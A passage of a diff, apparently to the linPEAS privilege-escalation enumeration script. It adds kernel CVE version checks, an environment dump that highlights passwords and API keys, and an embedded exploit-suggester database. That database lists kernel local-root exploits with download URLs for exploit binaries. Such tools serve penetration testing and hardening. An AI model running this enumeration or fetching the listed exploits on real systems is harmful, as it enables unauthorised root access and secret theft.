+kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') +if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version between 5.8 and 5.17 + echo "Potentially Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi + +#-- SY) CVE-2022-2588 +#-- https://github.com/Markakd/CVE-2022-2588 +kernelversion=$(uname -r | awk -F"-" '{print $1}') +kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') +if [ $kernelnumber -ge 3017000000 ] && [ $kernelnumber -lt 5019000000 ]; then # if kernel version between 3.17 and 5.19 + echo "Potentially Vulnerable to CVE-2022-2588" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +echo "" + #--SY) USBCreator if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") if [ -z "$pc_version" ]; then @@ -1211,10 +1379,15 @@ fi echo "" #-- SY) PATH + print_2title "PATH" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" -echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" -echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses" +if ! [ "$IAMROOT" ]; then + echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" + echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +else + echo "New path exported: $PATH" 2>/dev/null +fi echo "" #-- SY) Date @@ -1247,7 +1420,7 @@ fi if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then print_2title "Unmounted file-system?" print_info "Check if you can mount umounted devices" - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" + grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" echo "" fi @@ -1266,13 +1439,13 @@ fi #-- SY) Environment vars print_2title "Environment" print_info "Any private information inside environment variables?" -(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBELET" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBERNETES" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" echo "" #-- SY) Dmesg if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then print_2title "Searching Signature verification failed in dmesg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed" (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" echo "" fi @@ -1290,12 +1463,8 @@ fi if [ "$(command -v bash 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester" print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="#!/bin/bash

#
# Copyright (c) 2016-2020, @_mzet_
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under the terms of the GNU General Public License. See LICENSE
# file for usage of this software.
#

VERSION=v1.1

# bash colors
#txtred="\e[0;31m"
txtred="\e[91;1m"
txtgrn="\e[1;32m"
txtgray="\e[0;37m"
txtblu="\e[0;36m"
txtrst="\e[0m"
bldwht='\e[1;37m'
wht='\e[0;36m'
bldblu='\e[1;34m'
yellow='\e[1;93m'
lightyellow='\e[0;93m'

# input data
UNAME_A=""

# parsed data for current OS
KERNEL=""
OS=""
DISTRO=""
ARCH=""
PKG_LIST=""

# kernel config
KCONFIG=""

CVELIST_FILE=""

opt_fetch_bins=false
opt_fetch_srcs=false
opt_kernel_version=false
opt_uname_string=false
opt_pkglist_file=false
opt_cvelist_file=false
opt_checksec_mode=false
opt_full=false
opt_summary=false
opt_kernel_only=false
opt_userspace_only=false
opt_show_dos=false
opt_skip_more_checks=false
opt_skip_pkg_versions=false

ARGS=
SHORTOPTS="hVfbsu:k:dp:g"
LONGOPTS="help,version,full,fetch-binaries,fetch-sources,uname:,kernel:,show-dos,pkglist-file:,short,kernelspace-only,userspace-only,skip-more-checks,skip-pkg-versions,cvelist-file:,checksec"

## exploits database
declare -a EXPLOITS
declare -a EXPLOITS_USERSPACE

## temporary array for purpose of sorting exploits (based on exploits' rank)
declare -a exploits_to_sort
declare -a SORTED_EXPLOITS

############ LINUX KERNELSPACE EXPLOITS ####################
n=0

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} elflbl
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/elflbl
exploit-db: 744
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} uselib()
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
exploit-db: 778
Comments: Known to work only for 2.4 series (even though 2.6 is also vulnerable)
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} krad3
Reqs: pkg=linux-kernel,ver>=2.6.5,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 1397
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0077]${txtrst} mremap_pte
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.2
Tags:
Rank: 1
exploit-db: 160
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} raptor_prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2031
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2004
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl2
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2005
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl3
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2006
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl4
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2011
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-3626]${txtrst} h00lyshit
Reqs: pkg=linux-kernel,ver>=2.6.8,ver<=2.6.16
Tags:
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/h00lyshit
exploit-db: 2013
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice1
Reqs: pkg=linux-kernel,ver>=2.6.17,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5092
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice2
Reqs: pkg=linux-kernel,ver>=2.6.23,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5093
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} ftrex
Reqs: pkg=linux-kernel,ver>=2.6.11,ver<=2.6.22
Tags:
Rank: 1
exploit-db: 6851
Comments: world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} exit_notify
Reqs: pkg=linux-kernel,ver>=2.6.25,ver<=2.6.29
Tags:
Rank: 1
exploit-db: 8369
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692]${txtrst} sock_sendpage (simple version)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11
Rank: 1
exploit-db: 9479
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=9.04
Rank: 1
analysis-url: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz
exploit-db: 9435
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz
exploit-db: 9436
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz
exploit-db: 9641
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage (ppc)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=8.10,RHEL=4|5
Rank: 1
exploit-db: 9545
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} the rebel (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19
Tags: debian=4
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz
exploit-db: 9574
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: spender
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} hoagie_udp_sendmsg
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
exploit-db: 9575
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: andi
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} katon (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
src-url: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/raw/master/2009/CVE-2009-2698/katon.c
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: VxHell Labs
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} ip_append_data
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: fedora=4|5|6,RHEL=4
Rank: 1
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
exploit-db: 9542
author: p0c73n1
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 1
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33321
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33322
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 10018
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3301]${txtrst} ptrace_kmod2
Reqs: pkg=linux-kernel,ver>=2.6.26,ver<=2.6.34
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/kmod2
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/ptrace-kmod
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/ptrace_kmod2-64
exploit-db: 15023
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-1146]${txtrst} reiserfs
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.34
Tags: ubuntu=9.10
Rank: 1
analysis-url: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
src-url: https://jon.oberheide.org/files/team-edward.py
exploit-db: 12130
comments: Requires a ReiserFS filesystem mounted with extended attributes
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-2959]${txtrst} can_bcm
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.36
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Rank: 1
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/can_bcm
exploit-db: 14814
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3904]${txtrst} rds
Reqs: pkg=linux-kernel,ver>=2.6.30,ver<2.6.37
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Rank: 1
analysis-url: http://www.securityfocus.com/archive/1/514379
src-url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds64
exploit-db: 15285
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3848,CVE-2010-3850,CVE-2010-4073]${txtrst} half_nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Rank: 1
bin-url: http://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/half-nelson3
exploit-db: 17787
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36,x86
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15916
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root 2
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15944
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4347]${txtrst} american-sign-language
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags:
Rank: 1
exploit-db: 15774
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3437]${txtrst} pktcdvd
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=10.04
Rank: 1
exploit-db: 15150
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3081]${txtrst} video4linux
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.33
Tags: RHEL=5
Rank: 1
exploit-db: 15024
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0056]${txtrst} memodipper
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=3.1.0
Tags: ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)}
Rank: 1
analysis-url: https://git.zx2c4.com/CVE-2012-0056/about/
src-url: https://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper64
exploit-db: 18411
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0056,CVE-2010-3849,CVE-2010-3850]${txtrst} full-nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Rank: 1
src-url: http://vulnfactory.org/exploits/full-nelson.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson64
exploit-db: 15704
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1858]${txtrst} CLONE_NEWUSER|CLONE_FS
Reqs: pkg=linux-kernel,ver=3.8,CONFIG_USER_NS=y
Tags: 
Rank: 1
src-url: http://stealth.openwall.net/xSports/clown-newuser.c
analysis-url: https://lwn.net/Articles/543273/
exploit-db: 38390
author: Sebastian Krahmer
Comments: CONFIG_USER_NS needs to be enabled 
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent64
exploit-db: 26131
author: Andrea 'sorbo' Bittau
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent 2
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
src-url: https://cyseclabs.com/exploits/vnik_v1.c
exploit-db: 33589
author: Vitaly 'vnik' Nikolenko
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-0268]${txtrst} msr
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<3.7.6
Tags: 
Rank: 1
exploit-db: 27297
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1959]${txtrst} userns_root_sploit
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.8.9
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2013/04/29/1
exploit-db: 25450
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} semtex
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9
Tags: RHEL=6
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
exploit-db: 25444
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=13.10
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/timeoutpwn64
exploit-db: 31346
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn 2
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic}
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
exploit-db: 31347
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0196]${txtrst} rawmodePTY
Reqs: pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3
Tags:
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
exploit-db: 33516
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-2851]${txtrst} use-after-free in ping_init_sock() ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.14
Tags: 
Rank: 0
analysis-url: https://cyseclabs.com/page?n=02012016
exploit-db: 32926
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4014]${txtrst} inode_capable
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.13
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/06/10/4
exploit-db: 33824
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4699]${txtrst} ptrace/sysret
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.8
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/07/08/16
exploit-db: 34134
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4943]${txtrst} PPPoL2TP ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.2,ver<=3.15.6
Tags: 
Rank: 1
analysis-url: https://cyseclabs.com/page?n=01102015
exploit-db: 36267
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5207]${txtrst} fuse_suid
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1
Tags: 
Rank: 1
exploit-db: 34923
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-9322]${txtrst} BadIRET
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64
Tags: RHEL<=7,fedora=20
Rank: 1
analysis-url: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
src-url: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
exploit-db:
author: Rafal 'n3rgal' Wojtczuk & Adam 'pi3' Zabrocki
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3290]${txtrst} espfix64_NMI
Reqs: pkg=linux-kernel,ver>=3.13,ver<4.1.6,x86_64
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2015/08/04/8
exploit-db: 37722
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} bluetooth
Reqs: pkg=linux-kernel,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 4756
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1328]${txtrst} overlayfs
Reqs: pkg=linux-kernel,ver>=3.13.0,ver<=3.19.0
Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/717
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_32
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_64
exploit-db: 37292
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
Tags:
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39230
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
